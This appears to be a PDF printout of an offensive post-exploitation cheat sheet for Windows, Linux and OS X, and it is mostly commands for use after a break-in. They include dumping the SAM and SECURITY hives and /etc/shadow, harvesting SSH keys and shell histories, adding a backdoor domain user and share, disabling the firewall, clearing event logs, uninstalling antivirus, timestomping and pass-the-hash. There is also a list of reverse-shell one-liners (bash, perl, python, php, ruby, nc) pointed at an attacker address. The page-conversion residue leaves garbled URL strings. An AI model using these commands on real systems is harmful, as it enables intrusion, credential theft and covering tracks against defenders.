8/3/2019 Post Exploit
1/22
Windows Post Exploitation Command List
# Blind files (things to pull when all you can do is blindly read) LFI/dir
traversal
%SYSTEMDRIVE%\boot.ini
# System
##example: COMMAND [syntax1] | [syntax2] (explanation1; explanation2)
whoami
whoami /all
set
qwinsta
qprocess *
at
schtasks [/query /fo csv /v]
net start
sc getkeyname Shell Hardware Detection (use name from net start)
sc qc ShellHWDetection (use keyname from getkeyname)
net config workstation
net time
net file
net session
net use
tasklist [/m] | [/svc] | [/m {dll}]
fsutil fsinfo drives
8/3/2019 Post Exploit
2/22
# Networking
ipconfig /all
ipconfig /displaydns
netstat -bano
netstat -s -p [tcp|udp|icpm|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING //comment: (XP and up for -o flag to get PID,
zuk)
netstat -na | findstr LISTENING (Any windows, generic)
netsh diag show all
net view
net view /domain
net view /domain:otherdomain
net user hacker hacker /add /domain (adds a user to the curredomain
-invasive-)
net user %USERNAME% /domain
net user /domain
net accounts
net accounts /domain
net localgroup administrators
net localgroup administrators /domain (as this was supposed to use
localgroup&domain, this actually another way of getting *current* domain
admins. Zuk)
net group domain admins /domain
net group enterprise admins /domain
net group domain controllers /domain
8/3/2019 Post Exploit
3/22
nbtstat -a [ip_here]
net share
net session | find /c \\
arp -a
route print
netsh firewall set opmode disable (turns off firewall -invasive-)
netsh firewall set opmode enable (enables firewall -might cause loss of
connection-)
# Configs
gpresult /z
sc qc [ Service name ]
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
dir %PROGRAMFILES%
echo %COMSPEC%
# Finding important files
tree C:\ /f
dir /a
dir /b /s [Directory -- filename]
Command |find /c /v
8/3/2019 Post Exploit
4/22
# Files to pull if possible
%WINDIR%\repair\sam
%WINDIR%\System32\drivers\etc\hosts
# Remote System Access
net share \\computername
tasklist /V /S computername
net share nothing$=C:\ /grant:hacker,FULL /unlimited -invasive-
#net user hacker hacker /add
#net localgroup administrators /add hacker
#net use X: \\target\nothing$ hacker /USER:hacker
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername (maps IPC$ which does not show up as a drive)
net use \\computername /user:DOMAINNAME\username password
(maps IPC$ under another username)
net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\ (dir list a remote directory)
tasklist /V /S computername
Lists tasks w/users running those tasks on a remote system. This will remove
any IPC$ connection after it is done so if you are using another user, you
need to reinitiate the IPC$ mount
http://computername/http://target//nothing$http://computername/http://computername/http://computername/http://computername//share_or_admin_share//http://target//nothing$http://computername/http://computername/http://computername/http://computername//share_or_admin_share//http://computername/8/3/2019 Post Exploit
5/22
# WMI
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create process_name (executes a program)
wmic process where name=process_name call terminate (terminatesprogram)
wmic logicaldisk where drivetype=3 get name, freespace, systemname,
filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding
warranty info about target)
Reg Command
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
http://targetipaddr//http://targetipaddr//8/3/2019 Post Exploit
6/22
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to
add /s for recurse all values )
Deleting Logs
wevtutil el (list logs)
wevtutil cl (Clear specific log)
del %WINDIR%\*.log /a /s /q /f
Uninstalling Software AntiVirus (Non interactive)
wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this
uninstalls software)
# Other
pkgmgr usefull /iu :Package
pkgmgr usefull /iu :TelnetServer (Install Telnet Service ...)
pkgmgr /iu:TelnetClient (Client )
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe
cscript.exe
http://targetipaddr//http://targetipaddr//8/3/2019 Post Exploit
7/22
## OS SPECIFIC
# Win2k3
winpop stat domainname
# Vista/7
winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
(Page break just so we can have the straight up cmds on their own)
## Meterpreter Commands
ps (show running processes and their associated users/id numbers)
getuid
getpid
getprivs (shows current privileges)
getsystem (attempts to get SYSTEM, be warned, attempts Kitrap0d local
exploit as well)
sysinfo
8/3/2019 Post Exploit
8/22
timestomp (Remove/screw up timestamps if you are good enough this
messes up audit tools)
clearev
hashdump (dump SAM file hashes for pass the hash or cracking) or run
hashdump
migrate [pid number] (Move from exploited process into another process)
## Useful Meterpreter Scripts
## Useful Meterpreter Post Modules
vsploit
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
post/windows/escalate/bypassuac (mixed results)
## Useful Techniques
Pass The Hash attack (Gain access to other computers with stolen hashes,
no cracking involved)
Change Wallpaper
Ex: You have to upload a file called wallpaper.bmp to C: drive
8/3/2019 Post Exploit
9/22
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d
"C:\wallpaper.bmp"
rundll32.exe user32.dll,UpdatePerUserSystemParameters
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES
DOWN
-=SYSTEM=-
Command Expected and / or Sample Output
whoami Returns the username youre logged in as.
systemconfig
.
Linux/Unix/BSD Post Exploitation Command List
# Blind files (things to pull when all you can do is blindly read) LFI/dir
traversal
/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)
/etc/motd, /etc/issue
# System
8/3/2019 Post Exploit
10/22
uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
8/3/2019 Post Exploit
11/22
which nmap (see if its already installed)
locate bin/nmap
which nc (see if its already installed)
locate bin/
whoami
jps -l
# Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi
# Configs
cat /etc/issue{,.net}
cat /etc/passwd
8/3/2019 Post Exploit
12/22
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done
# (Lists all crons)
cat /etc/resolv.conf
cat /etc/lsb-release
cat /etc/redhat-release
cat /etc/samba/smb.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
# Determine Distro:
/etc/SUSE-release # Novell SUSE
/etc/redhat-release, /etc/redhat_version # Red Hat
8/3/2019 Post Exploit
13/22
/etc/fedora-release # Fedora
/etc/slackware-release, /etc/slackware-version # Slackware
/etc/debian_release, /etc/debian_version, # Debian
/etc/mandrake-release # Mandrake
/etc/sun-release # Sun JDS
/etc/release # Solaris/Sparc
/etc/gentoo-release # Gentoo
/etc/lsb-release # ubuntu
?? # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a (often hints at it pretty well)
# Installed Packages
rpm -qa --last | head
yum list | grep installed
dpkg -l
dpkg -l |grep -i linux-image
pkg_info # FreeBSD
#Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
8/3/2019 Post Exploit
14/22
cat /etc/yum.conf
# Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql l grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | sed s/:/ /g` -perm -4000 # find
suids
## Per User
ls -alh /home/*/
ls -alh /home/*/.ssh/
8/3/2019 Post Exploit
15/22
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find -type f /home/*/.vnc /home/*/.subversion
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
## Priv (sudod or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
lsof -nPi
ls /home/*/.ssh/*
## Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-
sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet8/3/2019 Post Exploit
16/22
perl -e 'use Socket;$i="10.0.0.1";
$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect
(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/s
h -i");};'
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
;s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh
-i &%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does
NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener- Xnest :1
Add permission to connect- xhost +victimIP
## GOING TO MOVE EVERYTHING HERE FOR LEDGIBILITY ONCE EDITING DIES
DOWN
-=SYSTEM=-
Command Expected and / or Sample Output
uname -a Linux kernel version, distribution
ps aux List of running processes
id List current user and group along with user/group id
w Show about who is logged,they are doing
8/3/2019 Post Exploit
17/22
who -a Print information about about users
OSX Post Exploitation Command List
# Blind files (things to pull when all you can do is blindly read) LFI/dir
traversal
/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)
#SYSTEM
uname -a
sw_vers -productName
sw_vers -productVersion
system_profiler
id
printenv
who
ps aux
ps ea
ls -alh /Applications/
/Library/Application Support/VMware Fusion/vmrun list
/Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest
windowsmalicious.exe WindowsVM
/Library/Application Support/VMware Fusion/vmrun captureScreen
8/3/2019 Post Exploit
18/22
WindowsVM
Snow Leopard and Lion
dscacheutil -q user
dscacheutil -q group
Tiger
lookupd -q user
lookupd -q group
#Networking
ifconfig
netstat -np tcp
netstat -np udp
#Configs
ls -alh /private/etc/
#Finding Important Files
ls -ma ~/
ls -alh /Users/
ls -alh /Users/*/.ssh/
ls -alh /Users/*/.gnupg/
8/3/2019 Post Exploit
19/22
#Files to pull
#Remote System Access
#Priv
cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl
ls /Library/Application Support/VMware Fusion/licenses/site/
8/3/2019 Post Exploit
20/22
8/3/2019 Post Exploit
21/22
8/3/2019 Post Exploit
22/22